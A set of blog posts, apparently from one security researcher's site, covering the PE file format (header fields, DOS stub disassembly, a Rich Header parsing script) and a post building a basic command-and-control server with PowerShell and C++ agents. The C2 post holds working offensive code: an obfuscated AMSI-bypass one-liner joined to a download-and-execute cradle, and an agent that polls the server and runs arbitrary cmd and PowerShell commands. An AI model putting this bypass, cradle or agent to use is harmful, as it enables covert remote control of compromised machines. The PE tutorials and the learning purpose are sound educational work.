  • SizeOfCode: This field holds the size of the code (.text) section, or the sum of all code sections if there are multiple sections.

  • SizeOfInitializedData: This field holds the size of the initialized data (.data) section, or the sum of all initialized data sections if there are multiple sections.

  • SizeOfUninitializedData: This field holds the size of the uninitialized data (.bss) section, or the sum of all uninitialized data sections if there are multiple sections.

  • AddressOfEntryPoint: An RVA of the entry point when the file is loaded into memory. The documentation states that for program images this relative address points to the starting address, and for device drivers it points to the initialization function. For DLLs an entry point is optional, and if no entry point is present the AddressOfEntryPoint field is set to 0.

  • BaseOfCode: An RVA of the start of the code section when the file is loaded into memory.

  • BaseOfData (PE32 Only): An RVA of the start of the data section when the file is loaded into memory.

  • ImageBase: This field holds the preferred address of the first byte of the image when loaded into memory (the preferred base address); this value must be a multiple of 64K. Due to memory protections like ASLR, and for a lot of other reasons, the address specified by this field is almost never used. In that case the PE loader picks an unused memory range to load the image into, and after loading the image at that address it goes through a process called relocation, in which it fixes the constant addresses within the image to work with the new image base. A special section holds information about the places that need fixing if relocation is required; that section is the relocation section (.reloc), more on that in the upcoming posts.

  • SectionAlignment: This field holds a value that gets used for section alignment in memory (in bytes), sections are aligned in memory boundaries that are multiples of this value. The documentation states that this value defaults to the page size for the architecture and it can’t be less than the value of FileAlignment.

  • FileAlignment: Similar to SectionAligment this field holds a value that gets used for section raw data alignment on disk (in bytes), if the size of the actual data in a section is less than the FileAlignment value, the rest of the chunk gets padded with zeroes to keep the alignment boundaries. The documentation states that this value should be a power of 2 between 512 and 64K, and if the value of SectionAlignment is less than the architecture’s page size then the sizes of FileAlignment and SectionAlignment must match.

  • MajorOperatingSystemVersion, MinorOperatingSystemVersion, MajorImageVersion, MinorImageVersion, MajorSubsystemVersion and MinorSubsystemVersion: These members of the structure specify the major version number of the required operating system, the minor version number of the required operating system, the major version number of the image, the minor version number of the image, the major version number of the subsystem and the minor version number of the subsystem respectively.

  • Win32VersionValue: A reserved field that the documentation says should be set to 0.

  • SizeOfImage: The size (in bytes) of the image as it will be loaded in memory, including all headers. It gets rounded up to a multiple of SectionAlignment because this value is used when the image is loaded into memory.

  • SizeOfHeaders: The combined size of the DOS stub, PE header (NT Headers), and section headers rounded up to a multiple of FileAlignment.

  • CheckSum: A checksum of the image file, it’s used to validate the image at load time.

  • Subsystem: This field specifies the Windows subsystem (if any) that is required to run the image, A complete list of the possible values of this field can be found on the official Microsoft documentation.

  • DLLCharacteristics: This field defines some characteristics of the executable image file, like if it’s NX compatible and if it can be relocated at run time. I have no idea why it’s named DLLCharacteristics, it exists within normal executable image files and it defines characteristics that can apply to normal executable files. A complete list of the possible flags for DLLCharacteristics can be found on the official Microsoft documentation.

  • SizeOfStackReserve, SizeOfStackCommit, SizeOfHeapReserve and SizeOfHeapCommit: These fields specify the size of the stack to reserve, the size of the stack to commit, the size of the local heap space to reserve and the size of the local heap space to commit respectively.

  • LoaderFlags: A reserved field that the documentation says should be set to 0.

  • NumberOfRvaAndSizes: The size of the DataDirectory array (the number of entries it contains).

  • DataDirectory: An array of IMAGE_DATA_DIRECTORY structures. We will talk about this in the next post.
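
As a rough sketch of how this is laid out on disk (again using struct and assuming a valid PE), the Optional Header starts right after the 20-byte File Header, and its first WORD, Magic, tells you whether you’re dealing with a PE32 or a PE32+ image:

import struct

with open("test.exe", "rb") as f:    # example path
    data = f.read()

e_lfanew   = struct.unpack_from("<I", data, 0x3C)[0]
opt_offset = e_lfanew + 4 + 20        # PE signature (4 bytes) + IMAGE_FILE_HEADER (20 bytes)

magic = struct.unpack_from("<H", data, opt_offset)[0]
if magic == 0x10B:
    print("PE32 (32-bit)")
elif magic == 0x20B:
    print("PE32+ (64-bit)")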

Let’s take a look at the Optional Header contents of an actual PE file.

We can talk about some of these fields, first one being the Magic field at the start of the header, it has the value 0x20B meaning that this is a PE32+ executable.

We can see that the entry point RVA is 0x12C4 and the code section start RVA is 0x1000, it follows the alignment defined by the SectionAlignment field which has the value of 0x1000.

File alignment is set to 0x200, and we can verify this by looking at any of the sections, for example the data section:

As you can see, the actual contents of the data section are from 0x2200 to 0x2229, however the rest of the section is padded until 0x23FF to comply with the alignment defined by FileAlignment.

SizeOfImage is set to 0x7000 and SizeOfHeaders is set to 0x400; they are multiples of SectionAlignment and FileAlignment respectively.

The Subsystem field is set to 3 which is the Windows console, and that makes sense because the program is a console application.

I didn’t include the DataDirectory in the optional header contents screenshot because we still haven’t talked about it yet.


Conclusion

We’ve reached the end of this post. In summary we looked at the NT Headers structure, and we discussed the File Header and Optional Header structures in detail.
In the next post we will take a look at the Data Directories, the Section Headers, and the sections.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 2: DOS Header, DOS Stub and Rich Header

By: 0xRick
22 October 2021 at 01:02

A dive into the PE file format - PE file structure - Part 2: DOS Header, DOS Stub and Rich Header

Introduction

In the previous post we looked at a high level overview of the PE file structure, in this post we’re going to talk about the first two parts which are the DOS Header and the DOS Stub.

The PE viewer I’m going to use throughout the series is called PE-bear, it’s full of features and has a good UI.


DOS Header

Overview

The DOS header (also called the MS-DOS header) is a 64-byte-long structure that exists at the start of the PE file.
It’s not important for the functionality of PE files on modern Windows systems; however, it’s there for backward compatibility reasons.
This header makes the file an MS-DOS executable, so when it’s loaded on MS-DOS the DOS stub gets executed instead of the actual program.
Without this header, if you attempt to load the executable on MS-DOS it will not be loaded and will just produce a generic error.

Structure

As mentioned before, it’s a 64-byte-long structure, we can take a look at the contents of that structure by looking at the IMAGE_DOS_HEADER structure definition from winnt.h:

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    WORD   e_cblp;                      // Bytes on last page of file
    WORD   e_cp;                        // Pages in file
    WORD   e_crlc;                      // Relocations
    WORD   e_cparhdr;                   // Size of header in paragraphs
    WORD   e_minalloc;                  // Minimum extra paragraphs needed
    WORD   e_maxalloc;                  // Maximum extra paragraphs needed
    WORD   e_ss;                        // Initial (relative) SS value
    WORD   e_sp;                        // Initial SP value
    WORD   e_csum;                      // Checksum
    WORD   e_ip;                        // Initial IP value
    WORD   e_cs;                        // Initial (relative) CS value
    WORD   e_lfarlc;                    // File address of relocation table
    WORD   e_ovno;                      // Overlay number
    WORD   e_res[4];                    // Reserved words
    WORD   e_oemid;                     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;                   // OEM information; e_oemid specific
    WORD   e_res2[10];                  // Reserved words
    LONG   e_lfanew;                    // File address of new exe header
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

This structure is important to the PE loader on MS-DOS, however only a few members of it are important to the PE loader on Windows Systems, so we’re not going to cover everything in here, just the important members of the structure.

  • e_magic: This is the first member of the DOS Header, it’s a WORD so it occupies 2 bytes, it’s usually called the magic number. It has a fixed value of 0x5A4D or MZ in ASCII, and it serves as a signature that marks the file as an MS-DOS executable.
  • e_lfanew: This is the last member of the DOS header structure, it’s located at offset 0x3C into the DOS header and it holds an offset to the start of the NT headers. This member is important to the PE loader on Windows systems because it tells the loader where to look for the file header.
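
A quick way to see these two members outside of a PE viewer is to read them directly off the file; here’s a minimal sketch with Python’s struct module (the path is just an example):

import struct

with open("test.exe", "rb") as f:
    dos_header = f.read(64)                       # the DOS header is 64 bytes long

e_magic  = struct.unpack_from("<H", dos_header, 0x00)[0]
e_lfanew = struct.unpack_from("<I", dos_header, 0x3C)[0]

print(hex(e_magic))     # 0x5a4d -> "MZ"
print(hex(e_lfanew))    # file offset of the NT headers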

The following picture shows contents of the DOS header in an actual PE file using PE-bear:

As you can see, the first member of the header is the magic number with the fixed value we talked about which was 5A4D.
The last member of the header (at offset 0x3C) is given the name “File address of new exe header”; it has the value 0x100, and if we follow that offset we’ll find the start of the NT headers as expected:


DOS Stub

Overview

The DOS stub is an MS-DOS program that prints an error message saying that the executable is not compatible with DOS then exits.
This is what gets executed when the program is loaded in MS-DOS, the default error message is “This program cannot be run in DOS mode.”, however this message can be changed by the user during compile time.

That’s all we need to know about the DOS stub, we don’t really care about it, but let’s take a look at what it’s doing just for fun.

Analysis

To be able to disassemble the machine code of the DOS stub, I copied the code of the stub from PE-bear, then I created a new file with the stub contents using a hex editor (HxD) and gave it the name dos-stub.exe.

Stub code:

0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 
74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 
6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00

After that I used IDA to disassemble the executable. MS-DOS programs are 16-bit programs, so I chose the Intel 8086 processor type and the 16-bit disassembly mode.

It’s a fairly simple program, let’s step through it line by line:

seg000:0000                 push    cs
seg000:0001                 pop     ds

The first line pushes the value of cs onto the stack and the second line pops that value from the top of the stack into ds. This is just a way of setting the data segment to the same value as the code segment.

seg000:0002                 mov     dx, 0Eh
seg000:0005                 mov     ah, 9
seg000:0007                 int     21h             ; DOS - PRINT STRING
seg000:0007                                         ; DS:DX -> string terminated by "$"

These three lines are responsible for printing the error message: the first line sets dx to the address of the string “This program cannot be run in DOS mode.” (0xE), the second line sets ah to 9 and the last line invokes interrupt 21h.

Interrupt 21h is a DOS interrupt (API call) that can do a lot of things, it takes a parameter that determines what function to execute and that parameter is passed in the ah register.
We see here that the value 9 is given to the interrupt, 9 is the code of the function that prints a string to the screen, that function takes a parameter which is the address of the string to print, that parameter is passed in the dx register as we can see in the code.

Information about the DOS API can be found on wikipedia.

seg000:0009                 mov     ax, 4C01h
seg000:000C                 int     21h             ; DOS - 2+ - QUIT WITH EXIT CODE (EXIT)
seg000:000C                                         ; AL = exit code

The last three lines of the program are again an interrupt 21h call; this time there’s a mov instruction that puts 0x4C01 into ax, which sets al to 0x01 and ah to 0x4C.

0x4c is the function code of the function that exits with an error code, it takes the error code from al, which in this case is 1.

So in summary, all the DOS stub does is print the error message and then exit with code 1.
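
By the way, instead of copying the stub bytes out of PE-bear by hand, you can also carve them out of the file programmatically. A rough sketch (it grabs everything between the end of the DOS header and e_lfanew, so it will also pick up the Rich Header if one is present):

import struct

with open("test.exe", "rb") as f:    # example path
    data = f.read()

e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
stub     = data[0x40:e_lfanew]       # the DOS header is 64 (0x40) bytes long

with open("dos-stub.bin", "wb") as out:
    out.write(stub)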


Rich Header

So now we’ve seen the DOS Header and the DOS Stub, however there’s still a chunk of data we haven’t talked about lying between the DOS Stub and the start of the NT Headers.

This chunk of data is commonly referred to as the Rich Header, it’s an undocumented structure that’s only present in executables built using the Microsoft Visual Studio toolset.
This structure holds some metadata about the tools used to build the executable like their names or types and their specific versions and build numbers.

All of the resources I have read about PE files didn’t mention this structure, however when searching about the Rich Header itself I found a decent amount of resources, and that makes sense because the Rich Header is not actually a part of the PE file format structure and can be completely zeroed-out without interfering with the executable’s functionality, it’s just something that Microsoft adds to any executable built using their Visual Studio toolset.

I only know about the Rich Header because I’ve read the reports on the Olympic Destroyer malware, and for those who don’t know what Olympic Destroyer is, it’s a malware that was written and used by a threat group in an attempt to disrupt the 2018 Winter Olympics.
This piece of malware is known for having a lot of false flags that were intentionally put to cause confusion and misattribution, one of the false flags present there was a Rich Header.
The authors of the malware overwrote the original Rich Header in the malware executable with the Rich Header of another malware attributed to the Lazarus threat group to make it look like it was Lazarus.
You can check Kaspersky’s report for more information about this.

The Rich Header consists of a chunk of XORed data followed by a signature (Rich) and a 32-bit checksum value that is the XOR key.
The encrypted data consists of a DWORD signature DanS, 3 zeroed-out DWORDs for padding, then pairs of DWORDs, each pair representing an entry; each entry holds a tool name (product ID), its build number and the number of times it’s been used.
In each DWORD pair the first DWORD holds the type ID or product ID in the high WORD and the build ID in the low WORD, while the second DWORD holds the use count.

PE-bear parses the Rich Header automatically:

As you can see the DanS signature is the first thing in the structure, then there are 3 zeroed-out DWORDs and after that comes the entries.
We can also see the corresponding tools and Visual Studio versions of the product and build IDs.

As an exercise I wrote a script to parse this header myself, it’s a very simple process, all we need to do is to XOR the data, then read the entry pairs and translate them.

Rich Header data:

7E 13 87 AA 3A 72 E9 F9 3A 72 E9 F9 3A 72 E9 F9
33 0A 7A F9 30 72 E9 F9 F1 1D E8 F8 38 72 E9 F9 
F1 1D EC F8 2B 72 E9 F9 F1 1D ED F8 30 72 E9 F9 
F1 1D EA F8 39 72 E9 F9 61 1A E8 F8 3F 72 E9 F9 
3A 72 E8 F9 0A 72 E9 F9 BC 02 E0 F8 3B 72 E9 F9 
BC 02 16 F9 3B 72 E9 F9 BC 02 EB F8 3B 72 E9 F9 
52 69 63 68 3A 72 E9 F9 00 00 00 00 00 00 00 00

Script:

import textwrap

def xor(data, key):
	return bytearray( ((data[i] ^ key[i % len(key)]) for i in range(0, len(data))) )

def rev_endiannes(data):
	tmp = [data[i:i+8] for i in range(0, len(data), 8)]
	
	for i in range(len(tmp)):
		tmp[i] = "".join(reversed([tmp[i][x:x+2] for x in range(0, len(tmp[i]), 2)]))
	
	return "".join(tmp)

data = bytearray.fromhex("7E1387AA3A72E9F93A72E9F93A72E9F9330A7AF93072E9F9F11DE8F83872E9F9F11DECF82B72E9F9F11DEDF83072E9F9F11DEAF83972E9F9611AE8F83F72E9F93A72E8F90A72E9F9BC02E0F83B72E9F9BC0216F93B72E9F9BC02EBF83B72E9F9")
key  = bytearray.fromhex("3A72E9F9")

rch_hdr = (xor(data,key)).hex()
rch_hdr = textwrap.wrap(rch_hdr, 16)

for i in range(2,len(rch_hdr)):
	tmp = textwrap.wrap(rch_hdr[i], 8)
	f1 = rev_endiannes(tmp[0])
	f2 = rev_endiannes(tmp[1])
	print("{} {} : {}.{}.{}".format(f1, f2, str(int(f1[4:],16)), str(int(f1[0:4],16)), str(int(f2,16)) ))

Please note that I had to reverse the byte-order because the data was presented in little-endian.

After running the script we can see an output that’s identical to PE-bear’s interpretation, meaning that the script works fine.

Translating these values into the actual tools types and versions is a matter of collecting the values from actual Visual Studio installations.
I checked the source code of bearparser (the parser used in PE-bear) and I found comments mentioning where these values were collected from.

//list from: https://github.com/kirschju/richheader
//list based on: https://github.com/kirschju/richheader + pnx's notes

You can check the source code for yourself, it’s on hasherezade’s (PE-bear author) Github page.


Conclusion

In this post we talked about the first two parts of the PE file, the DOS header and the DOS stub, we looked at the members of the DOS header structure and we reversed the DOS stub program.
We also looked at the Rich Header, a structure that’s not essentially a part of the PE file format but was worth checking.

The following image summarizes what we’ve talked about in this post:

A dive into the PE file format - PE file structure - Part 1: Overview

By: 0xRick
22 October 2021 at 01:01

A dive into the PE file format - PE file structure - Part 1: Overview

Introduction

The aim of this post is to provide a basic introduction to the PE file structure without talking about any details.


PE files

PE stands for Portable Executable, it’s a file format for executables used in Windows operating systems, it’s based on the COFF file format (Common Object File Format).

Not only .exe files are PE files; dynamic link libraries (.dll), kernel modules (.sys), Control Panel applications (.cpl) and many others are also PE files.

A PE file is a data structure that holds information necessary for the OS loader to be able to load that executable into memory and execute it.


Structure Overview

A typical PE file follows the structure outlined in the following figure:

If we open an executable file with PE-bear we’ll see the same thing:

DOS Header

Every PE file starts with a 64-byte-long structure called the DOS header; it’s what makes the PE file an MS-DOS executable.

DOS Stub

After the DOS header comes the DOS stub which is a small MS-DOS 2.0 compatible executable that just prints an error message saying “This program cannot be run in DOS mode” when the program is run in DOS mode.

NT Headers

The NT Headers part contains three main parts:

  • PE signature: A 4-byte signature that identifies the file as a PE file.
  • File Header: A standard COFF File Header. It holds some information about the PE file.
  • Optional Header: The most important header of the NT Headers, its name is the Optional Header because some files like object files don’t have it, however it’s required for image files (files like .exe files). This header provides important information to the OS loader.

Section Table

The section table follows the Optional Header immediately, it is an array of Image Section Headers, there’s a section header for every section in the PE file.
Each header contains information about the section it refers to.

Sections

Sections are where the actual contents of the file are stored, these include things like data and resources that the program uses, and also the actual code of the program, there are several sections each one with its own purpose.


Conclusion

In this post we looked at a very basic overview of the PE file structure and talked briefly about the main parts of a PE file.
In the upcoming posts we’ll talk about each one of these parts in much more detail.

A dive into the PE file format - Introduction

By: 0xRick
22 October 2021 at 01:00

A dive into the PE file format - Introduction

What is this ?

This is going to be a series of blog posts covering PE files in depth. It’s going to include a range of different topics, mainly the structure of PE files on disk and the way PE files get mapped and loaded into memory. We’ll also discuss applying that knowledge to building proof-of-concepts like PE parsers, packers and loaders, as well as proof-of-concepts for some of the memory injection techniques that require this kind of knowledge, such as PE injection, process hollowing, reflective DLL injection, etc.

Why ?

The more I got into reverse engineering and malware development, the more I found that knowledge of the PE file format is absolutely essential. I already knew the basics about PE files, but I had never learned about them properly.

Lately I have decided to learn about PE files, so the upcoming series of posts is going to be a documentation of what I’ve learned.

These posts are not going to cover anything new, there are a lot of resources that talk about the same thing, also the techniques that are going to be covered later have been known for some time. The goal is not to present anything new, the goal is to form a better understanding of things that already exist.

Contribution

If you’d like to add anything or if you found a mistake that needs correction feel free to contact me. Contact information can be found in the about page.

Update:

File structure - part 1: Overview
File structure - part 2: DOS Header, DOS Stub and Rich Header
File structure - part 3: NT Headers
File structure - part 4: Data Directories, Section Headers and Sections
File structure - part 5: PE Imports (Import Directory Table, ILT, IAT)
File structure - part 6: PE Base Relocations
File structure - lab1: Writing a PE Parser

Building a Basic C2

By: 0xRick
16 April 2020 at 01:00

Introduction

It’s very common that after successful exploitation an attacker would put an agent that maintains communication with a c2 server on the compromised system, and the reason for that is very simple, having an agent that provides persistency over large periods and almost all the capabilities an attacker would need to perform lateral movement and other post-exploitation actions is better than having a reverse shell for example. There are a lot of free open source post-exploitation toolsets that provide this kind of capability, like Metasploit, Empire and many others, and even if you only play CTFs it’s most likely that you have used one of those before.

Long story short, I only had a general idea about how these tools work and I wanted to understand the internals of them, so I decided to try and build one on my own. For the last three weeks, I have been searching and coding, and I came up with a very basic implementation of a c2 server and an agent. In this blog post I’m going to explain the approaches I took to build the different pieces of the tool.

Please keep in mind that some of these approaches might not be the best and the code might be kind of messy. If you have any suggestions for improvements feel free to contact me; I’d like to know what better approaches I could take. I’d also like to point out that this is not a tool to be used in real engagements: besides only doing basic actions like executing cmd and powershell, I didn’t take any opsec precautions into consideration.

This tool is still a work in progress, I finished the base but I’m still going to add more execution methods and more capabilities to the agent. After adding new features I will keep writing posts similar to this one, so that people with more experience give feedback and suggest improvements, while people with less experience learn.

You can find the tool on github.

Overview

About c2 servers / agents

As far as I know,

A basic c2 server should be able to:

  • Start and stop listeners.
  • Generate payloads.
  • Handle agents and task them to do stuff.

An agent should be able to:

  • Download and execute its tasks.
  • Send results.
  • Persist.

A listener should be able to:

  • Handle multiple agents.
  • Host files.

And all communications should be encrypted.

About the Tool

The server itself is written in Python 3. I wrote two agents, one in C++ and the other in PowerShell, and the listeners are HTTP listeners.

I couldn’t come up with a nice name so I would appreciate suggestions.

Listeners

Basic Info

Listeners are the core functionality of the server because they provide the way of communication between the server and the agents. I decided to use http listeners, and I used flask to create the listener application.

A Listener object is instantiated with a name, a port and an IP address to bind to:

class Listener:    

    def __init__(self, name, port, ipaddress):
        
        self.name       = name
        self.port       = port
        self.ipaddress  = ipaddress
        ...

Then it creates the needed directories to store files, and other data like the encryption key and agents’ data:

...	
    	
self.Path       = "data/listeners/{}/".format(self.name)
self.keyPath    = "{}key".format(self.Path)
self.filePath   = "{}files/".format(self.Path)
self.agentsPath = "{}agents/".format(self.Path)
        
...
        
if os.path.exists(self.Path) == False:
    os.mkdir(self.Path)

if os.path.exists(self.agentsPath) == False:
    os.mkdir(self.agentsPath)

if os.path.exists(self.filePath) == False:
    os.mkdir(self.filePath)

...

After that it creates a key, saves it and stores it in a variable (more on generateKey() in the encryption part):

...
    
if os.path.exists(self.keyPath) == False:
    
    key      = generateKey()
    self.key = key
    
    with open(self.keyPath, "wt") as f:
        f.write(key)
else:
    with open(self.keyPath, "rt") as f:
        self.key = f.read()
            
...
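
The generateKey() helper is covered in the encryption part. Purely as an illustration of what such a helper could look like, here’s a minimal sketch that produces a random symmetric key (this assumes the cryptography library’s Fernet and is not necessarily what the tool itself uses):

from cryptography.fernet import Fernet

def generateKey():
    # Fernet.generate_key() returns URL-safe base64-encoded random bytes,
    # decoded here to a string so it can be written to the key file as text
    return Fernet.generate_key().decode()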

The Flask Application

The flask application which provides all the functionality of the listener has 5 routes: /reg, /tasks/<name>, /results/<name>, /download/<name>, /sc/<name>.

/reg

/reg is responsible for handling new agents, it only accepts POST requests and it takes two parameters: name and type. name is for the hostname while type is for the agent’s type.

When it receives a new request it creates a random string of 6 uppercase letters as the new agent’s name (that name can be changed later), then it takes the hostname and the agent’s type from the request parameters. It also saves the remote address of the request which is the IP address of the compromised host.

With this information it creates a new Agent object and saves it to the agents database, and finally it responds with the generated random name so that the agent on the other side knows its name.

@self.app.route("/reg", methods=['POST'])
def registerAgent():
    name     = ''.join(choice(ascii_uppercase) for i in range(6))
    remoteip = flask.request.remote_addr
    hostname = flask.request.form.get("name")
    Type     = flask.request.form.get("type")
    success("Agent {} checked in.".format(name))
    writeToDatabase(agentsDB, Agent(name, self.name, remoteip, hostname, Type, self.key))
    return (name, 200)

/tasks/<name>

/tasks/<name> is the endpoint that agents request to download their tasks, <name> is a placeholder for the agent’s name, it only accepts GET requests.

It simply checks if there are new tasks (by checking if the tasks file exists), if there are new tasks it responds with the tasks, otherwise it sends an empty response (204).

@self.app.route("/tasks/<name>", methods=['GET'])
def serveTasks(name):
    if os.path.exists("{}{}/tasks".format(self.agentsPath, name)):
        
        with open("{}{}/tasks".format(self.agentsPath, name), "r") as f:
            task = f.read()
            clearAgentTasks(name)
        
        return(task,200)
    else:
        return ('',204)

/results/<name>

/results/<name> is the endpoint that agents request to send results, <name> is a placeholder for the agent’s name, it only accepts POST requests and it takes one parameter: result for the results.

It takes the results and sends them to a function called displayResults() (more on that function in the agent handler part), then it sends an empty response 204.

@self.app.route("/results/<name>", methods=['POST'])
def receiveResults(name):
    result = flask.request.form.get("result")
    displayResults(name, result)
    return ('',204)

/download/<name>

/download/<name> is responsible for downloading files, <name> is a placeholder for the file name, it only accepts GET requests.

It reads the requested file from the files path and it sends it.

@self.app.route("/download/<name>", methods=['GET'])
def sendFile(name):
    f    = open("{}{}".format(self.filePath, name), "rt")
    data = f.read()
            
    f.close()
    return (data, 200)

/sc/<name>

/sc/<name> is just a wrapper around the /download/<name> endpoint for PowerShell scripts. It responds with a download cradle prepended with a one-liner that bypasses AMSI; the cradle downloads the original script from /download/<name>. <name> is a placeholder for the script name, and the endpoint only accepts GET requests.

It takes the script name, creates a download cradle in the following format:

IEX(New-Object Net.WebClient).DownloadString('http://IP:PORT/download/SCRIPT_NAME')

and prepends that with the oneliner and responds with the full line.

@self.app.route("/sc/<name>", methods=['GET'])
def sendScript(name):
    amsi     = "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE](\"{1}{0}\"-F'F','rE' ) ) ; ( GeT-VariaBle ( \"1Q2U\" +\"zX\" ) -VaL).\"A`ss`Embly\".\"GET`TY`Pe\"(( \"{6}{3}{1}{4}{2}{0}{5}\" -f'Util','A','Amsi','.Management.','utomation.','s','System' )).\"g`etf`iElD\"( ( \"{0}{2}{1}\" -f'amsi','d','InitFaile' ),(\"{2}{4}{0}{1}{3}\" -f 'Stat','i','NonPubli','c','c,' )).\"sE`T`VaLUE\"(${n`ULl},${t`RuE} ); "
    oneliner = "{}IEX(New-Object Net.WebClient).DownloadString(\'http://{}:{}/download/{}\')".format(amsi,self.ipaddress,str(self.port),name)
    
    return (oneliner, 200)

Starting and Stopping

I had to start listeners in threads; however, flask applications don’t provide a reliable way to stop the application once it has started. The only way is to kill the process, but killing threads isn’t easy either, so what I did was create a Process object for the function that starts the application and a thread that starts that process, which means that terminating the process kills the thread and stops the application.

...
	
def run(self):
    self.app.logger.disabled = True
    self.app.run(port=self.port, host=self.ipaddress)

...
    
def start(self):
    
    self.server = Process(target=self.run)

    cli = sys.modules['flask.cli']
    cli.show_server_banner = lambda *x: None

    self.daemon = threading.Thread(name = self.name,
                                       target = self.server.start,
                                       args = ())
    self.daemon.daemon = True
    self.daemon.start()

    self.isRunning = True
    
def stop(self):
    
    self.server.terminate()
    self.server    = None
    self.daemon    = None
    self.isRunning = False

...

Agents

Basic Info

As mentioned earlier, I wrote two agents, one in powershell and the other in c++. Before going through the code of each one, let me talk about what agents do.

When an agent is executed on a system, first thing it does is get the hostname of that system then send the registration request to the server (/reg as discussed earlier).

After receiving the response which contains its name it starts an infinite loop in which it keeps checking if there are any new tasks, if there are new tasks it executes them and sends the results back to the server.

After each loop it sleeps for a specified amount of time that’s controlled by the server, the default sleep time is 3 seconds.

We can represent that in pseudo code like this:

get hostname
send [hostname, type], get name

loop{
	
	check if there are any new tasks
	
	if new_tasks{
    	
            execute tasks
    	    send results
    
    }
    
    else{
    	do nothing
    }
    
    sleep n 
}

So far, agents can only do two basic things, execute cmd and powershell.

PowerShell Agent

I won’t talk about the crypto functions here, I will leave that for the encryption part.

First 5 lines of the agent are just the basic variables which are the IP address, port, key, name and the time to sleep:

$ip   = "REPLACE_IP"
$port = "REPLACE_PORT"
$key  = "REPLACE_KEY"
$n    = 3
$name = ""

As mentioned earlier, It gets the hostname, sends the registration request and receives its name:

$hname = [System.Net.Dns]::GetHostName()
$type  = "p"
$regl  = ("http" + ':' + "//$ip" + ':' + "$port/reg")
$data  = @{
    name = "$hname" 
    type = "$type"
    }
$name  = (Invoke-WebRequest -UseBasicParsing -Uri $regl -Body $data -Method 'POST').Content

Based on the received name it creates the variables for the tasks uri and the results uri:

$resultl = ("http" + ':' + "//$ip" + ':' + "$port/results/$name")
$taskl   = ("http" + ':' + "//$ip" + ':' + "$port/tasks/$name")

Then it starts the infinite loop:

for (;;){
...
sleep $n
}

Let’s take a look inside the loop, first thing it does is request new tasks, we know that if there are no new tasks the server will respond with a 204 empty response, so it checks if the response is not null or empty and based on that it decides whether to execute the task execution code block or just sleep again:

$task  = (Invoke-WebRequest -UseBasicParsing -Uri $taskl -Method 'GET').Content
    
    if (-Not [string]::IsNullOrEmpty($task)){

Inside the task execution code block it takes the encrypted response and decrypts it, splits it then saves the first word in a variable called flag:

$task = Decrypt $key $task
$task = $task.split()
$flag = $task[0]

If the flag was VALID it will continue, otherwise it will sleep again. This ensures that the data has been decrypted correctly.

if ($flag -eq "VALID"){

After ensuring that the data is valid, it takes the command it’s supposed to execute and the arguments:

$command = $task[1]
$args    = $task[2..$task.Length]

There are 5 valid commands, shell, powershell, rename, sleep and quit.

shell executes cmd commands, powershell executes powershell commands, rename changes the agent’s name, sleep changes the sleep time and quit just exits.

Let’s take a look at each one of them. The shell and powershell commands basically rely on the same function called shell, so let’s look at that first:

function shell($fname, $arg){
    
    $pinfo                        = New-Object System.Diagnostics.ProcessStartInfo
    $pinfo.FileName               = $fname
    $pinfo.RedirectStandardError  = $true
    $pinfo.RedirectStandardOutput = $true
    $pinfo.UseShellExecute        = $false
    $pinfo.Arguments              = $arg
    $p                            = New-Object System.Diagnostics.Process
    $p.StartInfo                  = $pinfo
    
    $p.Start() | Out-Null
    $p.WaitForExit()
    
    $stdout = $p.StandardOutput.ReadToEnd()
    $stderr = $p.StandardError.ReadToEnd()

    $res = "VALID $stdout`n$stderr"
    $res
}

It starts a new process with the given file name, whether that’s cmd.exe or powershell.exe, and passes the given arguments. It then captures stdout and stderr and returns the result, which is the VALID flag followed by stdout and stderr separated by a newline.

Now back to the shell and powershell commands, both of them call shell() with the corresponding file name, receive the output, encrypt it and send it:

if ($command -eq "shell"){
    $f    = "cmd.exe"
    $arg  = "/c "
            
    foreach ($a in $args){ $arg += $a + " " }

    $res  = shell $f $arg
    $res  = Encrypt $key $res
    $data = @{result = "$res"}
                
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'

    }
    elseif ($command -eq "powershell"){
    
    $f    = "powershell.exe"
    $arg  = "/c "
            
    foreach ($a in $args){ $arg += $a + " " }

    $res  = shell $f $arg
    $res  = Encrypt $key $res
    $data = @{result = "$res"}
                
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'

    }

The sleep command updates the n variable then sends an empty result indicating that it completed the task:

elseif ($command -eq "sleep"){
    $n    = [int]$args[0]
    $data = @{result = ""}
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'
    }

The rename command updates the name variable and updates the tasks and results uris, then it sends an empty result indicating that it completed the task:

elseif ($command -eq "rename"){
    $name    = $args[0]
    $resultl = ("http" + ':' + "//$ip" + ':' + "$port/results/$name")
    $taskl   = ("http" + ':' + "//$ip" + ':' + "$port/tasks/$name")
    
    $data    = @{result = ""}
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'
    }

The quit command just exits:

elseif ($command -eq "quit"){
	exit
    }

C++ Agent

The same logic is applied in the c++ agent so I will skip the unnecessary parts and only talk about the http functions and the shell function.

Sending http requests wasn’t as easy as it was in powershell, I used the winhttp library and with the help of the Microsoft documentation I created two functions, one for sending GET requests and the other for sending POST requests. And they’re almost the same function so I guess I will rewrite them to be one function later.


std::string Get(std::string ip, unsigned int port, std::string uri)
{
    std::wstring sip     = get_utf16(ip, CP_UTF8);
    std::wstring suri    = get_utf16(uri, CP_UTF8);

    std::string response;

    LPSTR pszOutBuffer;

    DWORD dwSize       = 0;
    DWORD dwDownloaded = 0;
    BOOL  bResults     = FALSE;
 
    HINTERNET hSession = NULL,
              hConnect = NULL,
              hRequest = NULL;

    hSession = WinHttpOpen(L"test",
                           WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME,
                           WINHTTP_NO_PROXY_BYPASS,
                           0);

    if (hSession) {

        hConnect = WinHttpConnect(hSession,
                                  sip.c_str(),
                                  port,
                                  0);
    }

